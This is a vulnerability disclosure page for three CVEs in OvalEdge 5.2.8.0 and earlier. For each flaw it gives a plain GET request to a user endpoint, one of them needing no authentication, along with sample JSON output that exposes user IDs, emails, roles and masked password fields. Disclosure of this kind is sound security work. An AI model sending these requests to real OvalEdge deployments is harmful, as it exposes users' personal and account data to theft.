search
Page cover

Sensitive Data Exposure

OvalEdge 5.2.8.0 and earlier is affected by multiple Sensitive Data Exposure vulnerabilities.

hashtag
Sensitive Data Exposure (unauthenticated)

hashtag
CVE-2022-30361

hashtag
OvalEdge 5.2.8.0 and earlier is affected by a Sensitive Data Exposure vulnerability via a GET request to /user/getUserType. No authentication is required. The information disclosed is associated with the registered user ID, status, email address, role(s), user type, license type, and personal details such as first name, last name, gender, and user preferences.

circle-exclamation

https://example.com/ovaledge/user/getUserType?userid=admin

hashtag
Example Output

chevron-right{"userId":"admin","password":"[SECRET]","fName":"Admin","lName":"OvalEdge","gender":"Male","pPhone":"","email":"[email protected]","address":null,"role":"OE_ADMIN","title":"Admin","message":null,"name":"Admin OvalEdge","userType":"ovaledge","status":"active","lastmoddate":"2022-05-01 20:48:59.0","token":"","cityState":null,"slackId":"","notifyViaEmail":0,"zip":0,"outOfOffice":0,"managerid":null,"dgmanagerid":null,"dcmanagerid":null,"allowUserMentions":1,"allowWatchListAlert":1,"allowSystemAlert":1,"allowDqrAlert":0,"allowServiceDeskAlert":0,"licenseTypeCode":3,"licenseType":"Author & Analytical User","userSecret":null,"allowTeamAlert":1,"teamMessageUser":false,"allowUpdateOwner":1,"startIndex":0,"endIndex":0,"notifyViaSlack":0,"allowDqpAlert":0}hashtag

hashtag
Sensitive Data Exposure (authenticated)

hashtag
CVE-2022-30354

hashtag
OvalEdge 5.2.8.0 and earlier is affected by a Sensitive Data Exposure vulnerability via a GET request to /user/getUserWithTeam. Authentication is required. The information disclosed is associated with all registered user ID login values.

circle-exclamation

https://example.com/ovaledge/user/getUserWithTeam

hashtag
Example Output

chevron-right[{"userId":"#AIM"},{"userId":"[email protected]"},{"userId":"admin"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"clee"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"tlevans"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"},{"userId":"[email protected]"}]hashtag

hashtag
Sensitive Data Exposure (authenticated)

hashtag
CVE-2022-30359

hashtag
OvalEdge 5.2.8.0 and earlier is affected by a Sensitive Data Exposure vulnerability via a GET request to /user/getUserList. Authentication is required. The information disclosed is associated with the all registered users, including user ID, status, email address, role(s), user type, license type, and personal details such as first name, last name, gender, and user preferences.

circle-exclamation

https://lxo-ovaledge.afcucorp.local/ovaledge/user/getUserList

hashtag
Example Output

chevron-right[{"userId":"[email protected]","password":"[SECRET]","fName":"Adam","lName":"Jensen","gender":null,"pPhone":"","email":"[email protected]","address":null,"role":"CONTENT_CREATOR","title":"","message":null,"name":"Adam Jensen","userType":"SAML","status":"ACTIVE","lastmoddate":"2022-03-09 15:04:50.0","token":null,"cityState":null,"slackId":null,"notifyViaEmail":1,"zip":0,"outOfOffice":0,"managerid":null,"dgmanagerid":null,"dcmanagerid":null,"allowUserMentions":1,"allowWatchListAlert":1,"allowSystemAlert":1,"allowDqrAlert":1,"allowServiceDeskAlert":1,"licenseTypeCode":3,"licenseType":"Author & Analytical User","userSecret":null,"allowTeamAlert":0,"teamMessageUser":false,"allowUpdateOwner":0,"startIndex":0,"endIndex":0,"notifyViaSlack":0,"allowDqpAlert":0},{"userId":"admin","password":"[SECRET]","fName":"Admin","lName":"OvalEdge","gender":"Male","pPhone":"","email":"[email protected]","address":null,"role":"OE_ADMIN","title":"Admin","message":null,"name":"Admin OvalEdge","userType":"ovaledge","status":"active","lastmoddate":"2022-05-01 20:48:59.0","token":"","cityState":null,"slackId":"","notifyViaEmail":0,"zip":0,"outOfOffice":0,"managerid":null,"dgmanagerid":null,"dcmanagerid":null,"allowUserMentions":1,"allowWatchListAlert":1,"allowSystemAlert":1,"allowDqrAlert":0,"allowServiceDeskAlert":0,"licenseTypeCode":3,"licenseType":"Author & Analytical User","userSecret":null,"allowTeamAlert":1,"teamMessageUser":false,"allowUpdateOwner":1,"startIndex":0,"endIndex":0,"notifyViaSlack":0,"allowDqpAlert":0},.........}]hashtag

Last updated